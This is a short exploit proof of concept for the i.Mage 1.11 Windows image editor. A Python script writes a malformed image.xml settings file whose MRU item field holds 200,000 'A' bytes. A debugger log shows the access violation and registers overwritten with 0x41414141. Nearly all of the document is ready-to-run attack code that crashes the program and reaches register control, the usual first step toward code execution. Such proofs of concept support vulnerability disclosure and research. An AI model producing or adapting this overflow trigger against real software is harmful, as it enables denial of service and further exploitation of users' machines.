i.Mage 1.11 Local Crash Proof Of Concept

`#!/usr/bin/python  
#Exploit Title:i.Mage Local Crash Poc  
#Homepage:http://www.memecode.com/image.php  
#Software Link:http://sourceforge.net/projects/image-editor/files/i.mage-win32-v111.exe/download  
#Version:i.i.Mage v1.11 (Win32 Release)  
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...  
#Tested on:Win7 32bit EN-Ultimate   
#Exploit Author: metacom  
#Date:26.10.2014  
'''  
Immunity Debugger Log data  
Address=77B85FBD  
Message=[17:21:47] Access violation when reading [41414145]  
  
EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
ECX 41414141  
EDX 41414141  
EBX 01374F10  
ESP 0012F810  
EBP 0012F838  
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EDI 003A0000  
EIP 77B85FBD ntdll.77B85FBD'''  
print "\n[*]Vulnerable Created image.xml!"  
print "[*]Copy image.xml to C:\Program Files\Memecode\i.Mage"  
print "[*]Start i.Mage"  
print "[*]------------------------------------------------"  
  
poc="\x41" * 200000  
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"  
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x45\x72\x61\x73\x65\x57\x69\x64\x74\x68\x3d"  
header += "\x22\x31\x30\x22\x0a\x09\x20\x45\x72\x61\x73\x65\x41\x6d\x6f\x75\x6e\x74\x3d\x22\x32\x35\x35\x22\x0a\x09\x20\x44\x73\x70"  
header += "\x47\x72\x69\x64\x3d\x22\x31\x22\x0a\x09\x20\x54\x6f\x6f\x6c\x4f\x70\x65\x6e\x3d\x22\x30\x22\x0a\x09\x20\x41\x6e\x67\x6c"  
header += "\x65\x3d\x22\x30\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x37\x31\x37\x2c\x33\x34\x30\x2c\x31\x31\x31\x37\x2c\x36\x34\x30\x22"  
header += "\x0a\x09\x20\x45\x6e\x61\x62\x6c\x65\x64\x55\x6e\x64\x6f\x3d\x22\x31\x22\x0a\x09\x20\x46\x69\x6c\x6c\x4f\x62\x6a\x65\x63"  
header += "\x74\x73\x3d\x22\x31\x22\x0a\x09\x20\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x74\x50\x61\x73\x74\x65\x3d\x22\x30\x22\x0a"  
header += "\x09\x20\x4f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x30\x22\x0a\x09\x20\x41\x6c\x70\x68\x61\x3d\x22\x32\x35\x35\x22\x0a\x09"  
header += "\x20\x53\x70\x6c\x69\x74\x74\x65\x72\x50\x6f\x73\x3d\x22\x32\x35\x30\x22\x3e\x0a\x09\x3c\x4d\x72\x75\x20\x49\x74\x65\x6d"  
header += "\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x0a" + poc  
  
footer = "\x22\x20\x2f\x3e\x0a\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"  
  
payload=header + footer  
writeFile = open ("image.xml", "w")  
writeFile.write( payload )  
writeFile.close()  
`